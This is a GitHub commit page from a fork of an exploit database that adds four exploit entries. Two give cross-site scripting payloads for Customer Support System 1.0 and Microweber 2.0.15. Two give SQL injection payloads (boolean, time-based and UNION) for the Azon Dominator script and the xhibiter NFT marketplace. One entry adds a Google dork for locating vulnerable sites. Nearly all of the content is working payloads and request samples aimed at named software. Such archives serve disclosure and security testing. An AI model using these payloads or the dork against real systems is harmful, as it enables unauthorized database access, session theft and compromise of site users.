forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge remote-tracking branch 'upstream/main'
- Loading branch information
Showing
5 changed files
with
105 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
# Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site | ||
Scripting Vulnerability in the "subject" at "ticket_list" | ||
# Date: 28/11/2023 | ||
# Exploit Author: Geraldo Alcantara | ||
# Vendor Homepage: | ||
https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html | ||
# Software Link: | ||
https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code | ||
# Version: 1.0 | ||
# Tested on: Windows | ||
# CVE : CVE-2023-49976 | ||
*Steps to reproduce:* | ||
1- Log in to the application. | ||
2- Visit the ticket creation/editing page. | ||
3- Create/Edit a ticket and insert the malicious payload into the | ||
"subject" field/parameter. | ||
Payload: <dt/><b/><script>alert(document.domain)</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
# Exploit Title: Stored XSS in Microweber | ||
# Date: 06/18/2024 | ||
# Exploit Author: tmrswrr | ||
# Vendor Homepage: (https://microweber.me/) | ||
# Version: 2.0.15 | ||
# Tested on: (http://active.demo.microweber.me/) | ||
|
||
## Vulnerability Description | ||
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. | ||
|
||
## Steps to Reproduce | ||
1. Log in to the application. | ||
2. Navigate to `Users > Edit Profile`. | ||
3. In the `First Name` field, input the following payload: | ||
|
||
"><img src=x onerror=confirm(document.cookie)> | ||
|
||
4. Save the changes. | ||
5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
# Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection | ||
# Date: 2024-06-03 | ||
# Exploit Author: Buğra Enis Dönmez | ||
# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script | ||
# Demo Site: https://azon-dominator.webister.net/ | ||
# Tested on: Arch Linux | ||
# CVE: N/A | ||
|
||
### Request ### | ||
|
||
POST /fetch_products.php HTTP/1.1 | ||
Content-Type: application/x-www-form-urlencoded | ||
Accept: */* | ||
x-requested-with: XMLHttpRequest | ||
Referer: https://localhost/ | ||
Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8 | ||
Content-Length: 79 | ||
Accept-Encoding: gzip,deflate,br | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | ||
Host: localhost | ||
Connection: Keep-alive | ||
|
||
cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112 | ||
|
||
### | ||
|
||
### Parameter & Payloads ### | ||
|
||
Parameter: cid (POST) | ||
Type: boolean-based blind | ||
Title: AND boolean-based blind - WHERE or HAVING clause | ||
Payload: cid=1) AND 7735=7735 AND (5267=5267 | ||
|
||
Type: time-based blind | ||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) | ||
Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442 | ||
|
||
### |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
# Exploit Title: xhibiter nft marketplace SQLI | ||
# Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs" | ||
# Date: 29/06/204 | ||
# Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/ | ||
# Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA | ||
# Version: 1.10.2 | ||
# Tested on: linux | ||
# CVE : [if applicable] | ||
|
||
on this dir | ||
https://localhost/collections?id=2 | ||
xhibiter nft marketplace suffers from SQLI | ||
|
||
--- | ||
Parameter: id (GET) | ||
Type: boolean-based blind | ||
Title: AND boolean-based blind - WHERE or HAVING clause | ||
Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD | ||
|
||
Type: time-based blind | ||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) | ||
Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa | ||
|
||
Type: UNION query | ||
Title: MySQL UNION query (NULL) - 36 columns | ||
Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# | ||
--- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters